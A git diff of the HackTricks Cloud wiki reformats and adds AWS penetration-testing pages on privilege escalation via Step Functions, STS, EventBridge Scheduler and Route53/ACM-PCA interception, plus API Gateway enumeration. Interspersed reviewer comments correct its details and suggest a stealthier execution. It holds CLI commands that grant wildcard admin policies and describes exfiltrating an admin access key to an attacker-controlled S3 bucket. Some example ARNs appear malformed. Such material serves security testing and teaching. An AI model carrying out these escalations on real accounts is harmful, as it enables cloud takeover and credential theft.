@@ -80,7 +64,6 @@ aws stepfunctions test-state --definition file://stateDefinition.json --role-arn "status": "SUCCEEDED" } ``` -{% endcode %} **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. @@ -88,7 +71,6 @@ aws stepfunctions test-state --definition file://stateDefinition.json --role-arn An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine. -{% code overflow="wrap" %} ```bash # Create a state machine aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\ 
@@ -100,11 +82,10 @@ aws states start-execution --state-machine-arn [--name ] [--input # Start a Synchronous Express state machine execution aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ] ``` -{% endcode %} The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions. -* **stateMachineDefinition.json**: +- **stateMachineDefinition.json**: ```json { @@ -144,9 +125,8 @@ The following examples show how to create an state machine that creates an acces } ``` -* **Command** executed to **create the state machine**: +- **Command** executed to **create the state machine**: -{% code overflow="wrap" %} ```bash aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole { @@ -154,11 +134,9 @@ aws stepfunctions create-state-machine --name MaliciousStateMachine --definition "creationDate": "2024-07-09T20:29:35.381000+02:00" } ``` -{% endcode %} -* **Command** executed to **start an execution** of the previously created state machine: +- **Command** executed to **start an execution** of the previously created state machine: -{% code overflow="wrap" %} ```json aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine { 
@@ -166,11 +144,9 @@ aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:1 "startDate": "2024-07-09T20:33:35.466000+02:00" } ``` -{% endcode %} -{% hint style="warning" %} -The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. -{% endhint %} +> [!WARNING] +> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. 
@@ -183,21 +159,19 @@ Depending on how permissive is the IAM Role associated to the state machine is, 1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough. 2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition. -{% code overflow="wrap" %} ```bash aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \ [--tracing-configuration ] [--publish | --no-publish] [--version-description ] ``` -{% endcode %} The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. -{% hint style="warning" %} -If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). 
-{% endhint %} +> [!WARNING] +> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). + +{{#tabs }} +{{#tab name="Legit State Machine" }} -{% tabs %} -{% tab title="Legit State Machine" %} ```json { "Comment": "Hello world from Lambda state machine", @@ -222,9 +196,11 @@ If the state machine does not have a permissive IAM Role associated, it would al } } ``` -{% endtab %} -{% tab title="Malicious Updated State Machine" %} +{{#endtab }} + +{{#tab name="Malicious Updated State Machine" }} + ```json { "Comment": "Hello world from Lambda state machine", @@ -258,12 +234,12 @@ If the state machine does not have a permissive IAM Role associated, it would al } } ``` -{% endtab %} -{% endtabs %} -* **Command** executed to **update** **the legit state machine**: +{{#endtab }} +{{#endtabs }} + +- **Command** executed to **update** **the legit state machine**: -{% code overflow="wrap" %} ```bash aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json { @@ -271,21 +247,7 @@ aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-eas "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` -{% endcode %} **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md new file mode 100644 index 000000000..5fc330366 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md 
@@ -0,0 +1,122 @@ +# AWS - STS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## STS + +### `sts:AssumeRole` + +Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). + +For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +You can impersonate a role running: + +```bash +aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname +``` + +**Potential Impact:** Privesc to the role. + +> [!CAUTION] +> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ +> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. 
+ +### **`sts:GetFederationToken`** + +With this permission it's possible to generate credentials to impersonate any user: + +```bash +aws sts get-federation-token --name +``` + +This is how this permission can be given securely without giving access to impersonate other users: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "VisualEditor0", + "Effect": "Allow", + "Action": "sts:GetFederationToken", + "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" + } + ] +} +``` + +### `sts:AssumeRoleWithSAML` + +A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** + +An example of a trust policy with this permission is: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "OneLogin", + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" + }, + "Action": "sts:AssumeRoleWithSAML", + "Condition": { + "StringEquals": { + "SAML:aud": "https://signin.aws.amazon.com/saml" + } + } + } + ] +} +``` + +To generate credentials to impersonate the role in general you could use something like: + +```bash +aws sts assume-role-with-saml --role-arn --principal-arn +``` + +But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): + +```bash +onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 +``` + +**Potential Impact:** Privesc to the role. + +### `sts:AssumeRoleWithWebIdentity` + +This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. 
[Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) + +For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: + +```bash +aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token +# The role name can be found in the metadata of the configuration of the pod +``` + +### Federation Abuse + +{{#ref}} +../aws-basic-information/aws-federation-abuse.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md similarity index 79% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md index 56e02e600..8756dbf07 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md @@ -4,9 +4,9 @@ For more info about WorkDocs check: -{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} -[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-directory-services-workdocs-enum.md +{{#endref}} ### `workdocs:CreateUser` 
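Review bot: The `sts:GetFederationToken` section claims the permission lets a caller "generate credentials to impersonate any user", but GetFederationToken must be called with long-term IAM user credentials and the resulting federated-user session is limited to the intersection of the caller's own permissions and the session policy passed in the call, so it does not grant another principal's permissions. What the `${aws:username}` resource restriction actually mitigates is that the `--name` argument becomes the `federated-user/NAME` ARN, so an unrestricted caller can mint a session whose ARN matches a federated-user principal some resource policy or trust policy already grants access to; I would reword the sentence to `With this permission a user can mint federated-user sessions under an arbitrary name, which matters when resource policies trust specific federated-user/<name> ARNs`. In the `sts:AssumeRole` section the `"AWS": "*"` example is described as letting anyone assume the role, but when a trust policy names a wildcard or an account root rather than a specific principal ARN, the caller still needs `sts:AssumeRole` on the role in its own identity policy, so the CAUTION block ("not in a policy belonging to the attacker") holds only for trust policies that name a specific user or role. In the IRSA example, the role ARN is injected into the pod as the `AWS_ROLE_ARN` environment variable next to `AWS_WEB_IDENTITY_TOKEN_FILE`, which is a more concrete pointer than "the metadata of the configuration of the pod".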
@@ -44,8 +44,8 @@ aws workdocs add-resource-permissions --resource-id --principals Id=anonymo ### `workdocs:AddUserToGroup` -You can make a user admin by setting it in the group ZOCALO\_ADMIN.\ -For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html) +You can make a user admin by setting it in the group ZOCALO_ADMIN.\ +For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin` diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md new file mode 100644 index 000000000..f2b28170a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md 
@@ -0,0 +1,49 @@ +# AWS - EventBridge Scheduler Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## EventBridge Scheduler + +More info EventBridge Scheduler in: + +{{#ref}} +../aws-services/eventbridgescheduler-enum.md +{{#endref}} + +### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) + +An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action + +For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: + +```bash +aws scheduler create-schedule \ + --name MyLambdaSchedule \ + --schedule-expression "rate(5 minutes)" \ + --flexible-time-window "Mode=OFF" \ + --target '{ + "Arn": "arn:aws:lambda:::function:", + "RoleArn": "arn:aws:iam:::role/" + }' +``` + +In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. 
One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: + +```bash +aws scheduler create-schedule \ + --name GrantAdminToTargetRoleSchedule \ + --schedule-expression "rate(5 minutes)" \ + --flexible-time-window "Mode=OFF" \ + --target '{ + "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", + "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", + "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" + }' +``` + +## References + +- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) +- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md new file mode 100644 index 000000000..d7b87303e --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md 
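Review bot: The execution role passed in `RoleArn` has to carry a trust policy that lets `scheduler.amazonaws.com` assume it; `iam:PassRole` alone is not enough, and the text currently reads as if any role with `iam:PutRolePolicy` will do, so I would add `The target role must trust scheduler.amazonaws.com; list candidate roles with iam:ListRoles and check their AssumeRolePolicyDocument` after the first paragraph. The same fact is the defensive hook worth a sentence: an `iam:PassedToService` condition on `iam:PassRole` limited to the services that legitimately need it blocks this pivot. The target ARNs in both examples (`arn:aws:lambda:::function:` and `arn:aws:iam:::role/`) appear to have lost their region/account/name placeholders, possibly an extraction artifact, and now read as malformed ARNs, whereas `arn:aws:scheduler:::aws-sdk:iam:putRolePolicy` is correct as written because universal-target ARNs intentionally leave region and account empty. A `rate(5 minutes)` schedule re-runs the PutRolePolicy call indefinitely and leaves a repeating CloudTrail trail; a one-shot `at(...)` expression followed by deleting the schedule is the quieter variant if this is meant as an operational example.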
@@ -0,0 +1,32 @@ +# AWS - Route53 Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +For more information about Route53 check: + +{{#ref}} +../aws-services/aws-route53-enum.md +{{#endref}} + +### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` + +> [!NOTE] +> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. + +Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` + +Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. + +This is possible because: + +- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) +- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names +- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names + +**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. 
+ +#### Exploitation + +Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md new file mode 100644 index 000000000..4c1f06d1a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/README.md 
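Review bot: The third bullet states as an absolute that a private CA in ACM-PCA cannot be restricted to specific Common Names, but AWS Private CA has, as far as I can tell, since added support for the X.509 Name Constraints extension on CA certificates, so a CA issued with permitted/excluded subtrees would refuse a leaf for `*.amazonaws.com`; I would soften it to `Private CAs are commonly created without Name Constraints, so by default they sign a certificate for any name`. The text should also state the precondition the interception actually depends on: the attacker's private hosted zone must be associated with the victim VPC (CreateHostedZone with a VPC argument, or `route53:AssociateVPCWithHostedZone`), and the VPC must have `enableDnsSupport`/`enableDnsHostnames` enabled so instances use the Route 53 resolver, otherwise the spoofed records are never consulted. For detection, `CreateHostedZone`/`ChangeResourceRecordSets` events for `amazonaws.com` names and `acm-pca:IssueCertificate` requests for AWS service hostnames are high-fidelity CloudTrail signals worth noting next to the Potential Impact line.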
@@ -0,0 +1,31 @@ +# AWS - Services + +{{#include ../../../banners/hacktricks-training.md}} + +## Types of services + +### Container services + +Services that fall under container services have the following characteristics: + +- The service itself runs on **separate infrastructure instances**, such as EC2. +- **AWS** is responsible for **managing the operating system and the platform**. +- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. +- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. +- Also, platform-level identity and access management where it exists. +- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. + +### Abstract Services + +- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. +- The services are accessed via endpoints using AWS application programming interfaces, APIs. +- The **underlying infrastructure, operating system, and platform is managed by AWS**. +- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. +- **Data is isolated via security mechanisms**. +- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. + +## Services Enumeration + +**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md similarity index 71% rename from pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 6a7b8d82f..18b4e1ea6 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -1,19 +1,6 @@ # AWS - API Gateway Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## API Gateway 
@@ -25,19 +12,19 @@ API Gateway enables you to define **how requests to your APIs should be handled* ### API Gateways Types -* **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. -* **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. -* **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. -* **REST API Private**: Create a REST API that is only accessible from within a VPC. +- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. +- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. +- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. +- **REST API Private**: Create a REST API that is only accessible from within a VPC. ### API Gateway Main Components 1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}. 2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. 
You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage. - * The stage is indicated at the beggining of the URL of the API Gateway endpoint. + - The stage is indicated at the beggining of the URL of the API Gateway endpoint. 3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**. 4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API. - * In order to make effect the API needs to be **deployed again after** the resource policy is modified. 
+ - In order to make effect the API needs to be **deployed again after** the resource policy is modified. ### Logging @@ -45,12 +32,12 @@ By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and ### Enumeration -{% hint style="success" %} -Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** -{% endhint %} +> [!TIP] +> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** + +{{#tabs }} +{{#tab name="apigateway" }} -{% tabs %} -{% tab title="apigateway" %} ```bash # Generic info aws apigateway get-account @@ -91,9 +78,11 @@ aws apigateway get-usage-plan-key --usage-plan-id --key-id ###Already consumed aws apigateway get-usage --usage-plan-id --start-date 2023-07-01 --end-date 2023-07-12 ``` -{% endtab %} -{% tab title="apigatewayv2" %} +{{#endtab }} + +{{#tab name="apigatewayv2" }} + ```bash # Generic info aws apigatewayv2 get-domain-names @@ -135,8 +124,9 @@ aws apigatewayv2 get-models --api-id ## Call API https://.execute-api..amazonaws.com// ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ## Different Authorizations to access API Gateway endpoints @@ -145,7 +135,7 @@ https://.execute-api..amazonaws.com// It's possible to use resource policies to define who could call the API endpoints.\ In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET. -
+
### IAM Authorizer @@ -163,7 +153,7 @@ $ curl -X https://.execute-api..amazonaws.com//< Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**. -
+
Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint. @@ -263,9 +253,8 @@ Call it with something like:
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
 
-{% hint style="warning" %} -Depending on the Lambda code, this authorization might be vulnerable -{% endhint %} +> [!WARNING] +> Depending on the Lambda code, this authorization might be vulnerable Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` @@ -275,49 +264,36 @@ This way you could **identify this authorization** being in place. It's possible to set API endpoints that **require a valid API key** to contact it. -
+
It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month). To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: -
+
## Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md" %} -[aws-api-gateway-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +{{#endref}} ## Privesc -{% content-ref url="../aws-privilege-escalation/aws-apigateway-privesc.md" %} -[aws-apigateway-privesc.md](../aws-privilege-escalation/aws-apigateway-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-apigateway-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-api-gateway-post-exploitation.md" %} -[aws-api-gateway-post-exploitation.md](../aws-post-exploitation/aws-api-gateway-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-api-gateway-post-exploitation.md +{{#endref}} ## Persistence -{% content-ref url="../aws-persistence/aws-api-gateway-persistence.md" %} -[aws-api-gateway-persistence.md](../aws-persistence/aws-api-gateway-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-api-gateway-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md similarity index 51% rename from pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md rename to src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index 52437363f..679781fe8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -1,19 +1,6 @@ # AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
